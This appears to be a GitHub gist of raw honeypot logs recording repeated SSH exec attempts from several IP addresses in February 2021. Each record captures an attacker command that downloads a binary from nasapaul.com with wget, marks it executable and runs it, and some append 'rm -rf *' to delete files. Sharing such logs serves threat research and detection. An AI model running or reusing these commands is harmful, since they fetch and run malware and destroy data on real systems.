Skip to content

Instantly share code, notes, and snippets.

@malwaremily
Created Feb 26, 2021
Embed
What would you like to do?
nasapaul security event raw logs
12:22:55.220 services ▶ DEBU 6472 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000f48000] 0} 0xc000efa960 {0 0} 0xc000efaa80 0xc000efaf60 0xc000e9c300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95440) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e953e0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433110 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc000e99a20 0xc000e99a20 false}) %!s(*ssh.buffer=&{0xc000032900 0xc000e99a60 0xc000e99a60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
services > ssh > category=ssh, date=2021-02-14 12:22:55.22099094 +0000 UTC m=+1345163.502386732, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=49642, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khc7gk9kn000dnacu0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
12:26:30.497 services ▶ DEBU 64db Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000938000] 0} 0xc00006b080 {0 0} 0xc00006b1a0 0xc00006b2c0 0xc000032080 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6420) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d63c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482820 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc00115ee00 0xc00115ee00 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc00115ef20 0xc00115ef20 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
services > ssh > category=ssh, date=2021-02-14 12:26:30.49813889 +0000 UTC m=+1345378.779534691, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=45348, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khdt8k9kn000dnadb0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
15:00:09.483 services ▶ DEBU 6aac Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc000e955c0 {0 0} 0xc000e956e0 0xc000e95740 0xc000e9c200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001148b20 {0 0 0 <nil> <nil>} 824633927088}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000325c0 0xc000e984e0 0xc000e984e0 false}) %!s(*ssh.buffer=&{0xc000032600 0xc000e98520 0xc000e98520 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-15 15:00:09.484309044 +0000 UTC m=+1440997.765704822, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=52828, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8ou0k9kn000dnaj7g, token=c0a8v4ok9kn000dn77n0, type=ssh-request
15:04:27.762 services ▶ DEBU 6b11 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000ae0840 {{0 0} [0xc001016480] 0} 0xc0011d7260 {0 0} 0xc0011d72c0 0xc0011d7320 0xc000e9cb80 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824633929008}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032d40 0xc000e99940 0xc000e99940 false}) %!s(*ssh.buffer=&{0xc000032d80 0xc000e99980 0xc000e99980 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-15 15:04:27.762821171 +0000 UTC m=+1441256.044216965, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=60866, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8qugk9kn000dnajk0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:49.380 services ▶ DEBU 6ce9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc0011d6840 {0 0} 0xc0011d69c0 0xc0011d6a20 0xc0000325c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa4e0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039370 {0 0 0 <nil> <nil>} 824649040368}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c200 0xc000e98540 0xc000e98540 false}) %!s(*ssh.buffer=&{0xc000e9c240 0xc000e98580 0xc000e98580 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:49.381412233 +0000 UTC m=+1476557.662808034, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=50930, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo0k9kn000dnalfg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:50.686 services ▶ DEBU 6cee Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de160 {{0 0} [0xc000e52180] 0} 0xc0011d6fc0 {0 0} 0xc0011d7020 0xc0011d70e0 0xc0000327c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d71a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7140) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f90 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc0011fe9c0 0xc0011fe9c0 false}) %!s(*ssh.buffer=&{0xc000032900 0xc0011fea00 0xc0011fea00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:50.686498457 +0000 UTC m=+1476558.967894237, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56258, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo8k9kn000dnalg0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:58.117 services ▶ DEBU 6cf3 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee000 {{0 0} [0xc0000ba540] 0} 0xc000efade0 {0 0} 0xc000efae40 0xc000efaea0 0xc000e9c500 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efafc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efaf60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039fe8 {0 0 0 <nil> <nil>} 824649041328}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c5c0 0xc000e98d80 0xc000e98d80 false}) %!s(*ssh.buffer=&{0xc000e9c600 0xc000e98de0 0xc000e98de0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:58.117645982 +0000 UTC m=+1476566.399041785, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59120, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheq8k9kn000dnalgg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:59.349 services ▶ DEBU 6cf8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de580 {{0 0} [0xc000e523c0] 0} 0xc000efb380 {0 0} 0xc000efb3e0 0xc000efb440 0xc000e9c700 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004326e8 {0 0 0 <nil> <nil>} 824633929392}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032ec0 0xc0011feea0 0xc0011feea0 false}) %!s(*ssh.buffer=&{0xc000032f00 0xc0011feee0 0xc0011feee0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:59.349959932 +0000 UTC m=+1476567.631356102, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=35994, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheqgk9kn000dnalh0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:26.631 services ▶ DEBU 6cfd Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee160 {{0 0} [0xc0000ba900] 0} 0xc0011d76e0 {0 0} 0xc0011d7740 0xc0011d77a0 0xc000033100 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb980) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb860) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e91680 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99880 0xc000e99880 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e998c0 0xc000e998c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:26.632099423 +0000 UTC m=+1476594.913495286, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59004, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf18k9kn000dnalhg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:29.019 services ▶ DEBU 6d02 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee2c0 {{0 0} [0xc000e52600] 0} 0xc0011d7860 {0 0} 0xc0011d78c0 0xc0011d7920 0xc000033240 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7a40) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7980) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433468 {0 0 0 <nil> <nil>} 824633930544}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033340 0xc0011ff720 0xc0011ff720 false}) %!s(*ssh.buffer=&{0xc000033380 0xc0011ff760 0xc0011ff760 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:29.019387375 +0000 UTC m=+1476597.300783158, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=41322, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf20k9kn000dnali0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:30.330 services ▶ DEBU 6d07 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de6e0 {{0 0} [0xc0000bac00] 0} 0xc0011d7e00 {0 0} 0xc0011d7e60 0xc0011d7ec0 0xc000033480 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efbf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efbf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824649043760}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cf40 0xc000e99f60 0xc000e99f60 false}) %!s(*ssh.buffer=&{0xc000e9cf80 0xc000e99fa0 0xc000e99fa0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:30.330822166 +0000 UTC m=+1476598.612217958, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46912, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf28k9kn000dnalig, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:32.568 services ▶ DEBU 6d0c Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de840 {{0 0} [0xc0000bad80] 0} 0xc00006be00 {0 0} 0xc00006bec0 0xc00006bf20 0xc000033640 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e94720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e94360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149468 {0 0 0 <nil> <nil>} 824649044464}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9d200 0xc001151c00 0xc001151c00 false}) %!s(*ssh.buffer=&{0xc000e9d240 0xc001151d40 0xc001151d40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:32.568412599 +0000 UTC m=+1476600.849808398, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56648, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf2ok9kn000dnalj0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:19:33.077 services ▶ DEBU 6fe9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000e52420 {{0 0} [0xc0009c0480] 0} 0xc0011d7a40 {0 0} 0xc0011d7aa0 0xc0011d7b00 0xc000032d40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7bc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7b60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039d28 {0 0 0 <nil> <nil>} 824633929200}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032e00 0xc0011fec20 0xc0011fec20 false}) %!s(*ssh.buffer=&{0xc000032e40 0xc0011fec60 0xc0011fec60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:19:33.077819662 +0000 UTC m=+1478161.359215439, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=38310, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhr90k9kn000dnaoeg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:19:41.604 services ▶ DEBU 6ff2 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0009c0780] 0} 0xc00006bda0 {0 0} 0xc00006be00 0xc00006bec0 0xc000033200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc00006bf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc00006bf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827e0 {0 0 0 <nil> <nil>} 824633930416}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000332c0 0xc0011ff500 0xc0011ff500 false}) %!s(*ssh.buffer=&{0xc000033300 0xc0011ff540 0xc0011ff540 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:19:41.605220152 +0000 UTC m=+1478169.886615964, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46416, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrb0k9kn000dnaofg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
